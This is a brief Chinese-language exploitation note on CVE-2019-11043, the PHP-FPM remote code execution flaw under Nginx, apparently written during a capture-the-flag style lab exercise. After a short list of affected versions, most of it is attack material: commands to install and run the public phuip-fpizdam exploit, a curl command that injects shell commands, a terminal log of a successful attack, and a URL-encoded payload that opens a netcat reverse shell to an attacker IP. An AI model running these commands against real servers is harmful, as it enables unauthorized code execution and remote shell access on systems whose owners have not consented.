CVE-2019-11043
1. 漏洞描述
PHP 7 的 PHP-FPM 存在远程代码执行漏洞
2. 影响范围
在 Nginx + PHP-FPM 环境下,当启用了上述 Nginx 配置后,以下 PHP 版本受本次漏洞影响,另外,PHP 5.6版本也受此漏洞影响,但目前只能 Crash,不可以远程代码执行:
- 低于7.1.33的PHP版本7.1.x,
- 低于7.2.24的7.2.x
- 低于7.3.11的7.3.x
3. 利用方式
apt-get install golang
go get github.com/neex/phuip-fpizdam
export PATH=$PATH:$(go env GOPATH)/bin
利用
phuip-fpizdam http://192.168.42.43/index.php
curl http://192.168.42.115/index.php/?a=/bin/sh+-c+'<命令>;<命令>'
建议对'<命令>;<命令>' 进行url编码
参考
┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# phuip-fpizdam http://192.168.42.43/index.php
2024/12/04 12:39:32 Base status code is 200
2024/12/04 12:39:32 Status code 502 for qsl=1765, adding as a candidate
2024/12/04 12:39:32 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2024/12/04 12:39:32 Attack params found: --qsl 1755 --pisos 23 --skip-detect
2024/12/04 12:39:32 Trying to set "session.auto_start=0"...
2024/12/04 12:39:32 Detect() returned attack params: --qsl 1755 --pisos 23 --skip-detect <-- REMEMBER THIS
2024/12/04 12:39:32 Performing attack using php.ini settings...
2024/12/04 12:39:33 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2024/12/04 12:39:33 Trying to cleanup /tmp/a...
2024/12/04 12:39:33 Done!
#urlencode('id;nc -e /bin/bash 192.168.42.39 1234 ')
┌──(root㉿kali)-[/home/kali/hmv/emma]
└─# curl http://192.168.42.115/index.php/?a=/bin/sh+-c+%27id%3Bnc%20-e%20%2Fbin%2Fbash%20192.168.42.39%201234%20%27